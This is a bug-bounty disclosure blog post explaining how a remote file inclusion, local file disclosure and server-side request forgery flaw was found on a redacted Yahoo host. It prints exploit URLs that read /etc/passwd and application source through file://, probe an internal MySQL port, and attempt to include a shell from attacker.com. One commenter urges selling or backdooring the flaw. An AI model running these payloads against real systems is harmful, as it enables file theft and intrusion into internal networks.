Yahoo! Escalated Remote File Inclusion Vulnerability.

yahoo_logo_large-100044513-large

Hello Everyone 🙂

Today’s article will be explained in 2 main phases.

1- How i found the Yahoo LFD/RFI (Local File Disclosure/Remote File Inclusion) Vulnerability

2- Exploitation Techniques

#Important Note: Yahoo! asked to remove the domain name and some other parts from this write-up before it is being published. also the video POC has been removed to not disclose the affected hostname.

Screen Shot 2016-12-03 at 4.29.55 PM

1- How i found the Yahoo LFD/RFI (Local File Disclosure/Remote File Inclusion) Vulnerability

As you know, it all starts with information gathering. after collecting some Yahoo sub-domains, i started working on:
https://x.x.yahoo.net

with some file/dir names brute-forcing, below page were found:

https://x.x.yahoo.net/mod/test.php

Screen-Shot-2016-11-11-at-11.09.07-AM

By viewing the page source code, below page got my attention:

Screen-Shot-2016-11-11-at-11.11.01-AM

as you can see, images are loaded from remote url using the parameter named as “img_url”.

By tampering with the parameter “img_url”, i figured-out that i can include remote files and not only image files!

2- Exploitation Techniques

NOTE: kindly note that all the payloads has been tested on “x.x.x.yahoo.net” which is a redundant/secondary server and not on the main site, just to avoid being detected and to avoid causing any issues to a Yahoo production environment during the test.

After finding the remote file inclusion vulnerability, i tried multiple techniques to gain shell access to the server such as including “http://attacker.com/shell.txt?”. I also tried gaining shell access by LFI such as injecting log files and the famous /proc/self/environ trick (References: Ref1, Ref2) with no luck at all.

It seems the server php.ini configuration file is well configured, or maybe it is all about how the backend code handles the requested URL’s?

 Time for LFD (Local File Disclosure) instead of RFI:

first thing that comes in mind when thinking of LFI/LFD is php wrappers:

Screen Shot 2016-11-11 at 11.27.47 PM

Although that php Wrappers php://input, php://output, data://, ftp:// etc didn’t work for me, Fortunately 2 techniques worked. first is using php wrapper called file:// and second is using normal http:// protocol to access internal hosts.

1- https://x.x.x.yahoo.net/mod/display_img.php?img_url=file:///etc/passwd 

#file:// is a php wrapper used to access local filesystem

Screen-Shot-2016-11-10-at-5.53.01-AM-1024x449

By reading the /etc/hosts file, i now know that the internally used subnet is 192.168.100.0/24

Screen-Shot-2016-11-10-at-5.51.17-AM-1024x449

As you can see from the above screenshot, the database server is hosted on 192.168.100.1/2/3/4, which were confirmed by a simple SSRF (Server Side Request Forgery) #to not be confused with Cross Site Port Scanning (XSPS) as this wasn’t a port scanning but SSRF.

https://x.x.x.yahoo.net/mod/display_img.php?img_url=http://192.168.100.2:3306/

#3306/TCP is the default port used by Mysql Database server.

Screen-Shot-2016-11-10-at-8.55.47-PM-1024x201

Now let’s scan the internal subnet for live hosts, i wrote a simple python script to initiate requests to each IP, if a valid response is returned, then the host is up and running a webserver (it was done on different ports as well).

LiveHosts

Brute-Forcing filenames/dirs on an internally hosted server:

BruteForcing

As a final step i did read the apache configuration file to find the configured path were the application is hosted:

Screen Shot 2016-11-13 at 10.08.25 AM

Next  step were to read some source code:

https://x.x.x.yahoo.net/mod/display_img.php?img_url=file:///home/httpd/httpd/class/db_class.php

sourceCode2-1024x249

 

Screen Shot 2016-12-01 at 2.29.09 AM

Although that i was able to initiate requests to Yahoo.com intranet, Yahoo still consider Yahoo.net as out of scope.
Yahoo rewarded this critical finding with 250$ !!

 

 

 

 

 

 

5 Comments

  1. Muhammed bassem - December 9, 2016

    Congratulation on the bounty, good write up by the way

  2. ahmad - December 18, 2016

    Aslamo alykom, Do you use your own script for brute-forcing the file/dir names?

  3. Maradona - February 2, 2017

    250$ only !!!! how much it worth if its on deepweb ???
    Tamam ya man . bsss next time backdoor it 😉 …. 3lshan al7rkaat al3raaa3 deee

Leave a reply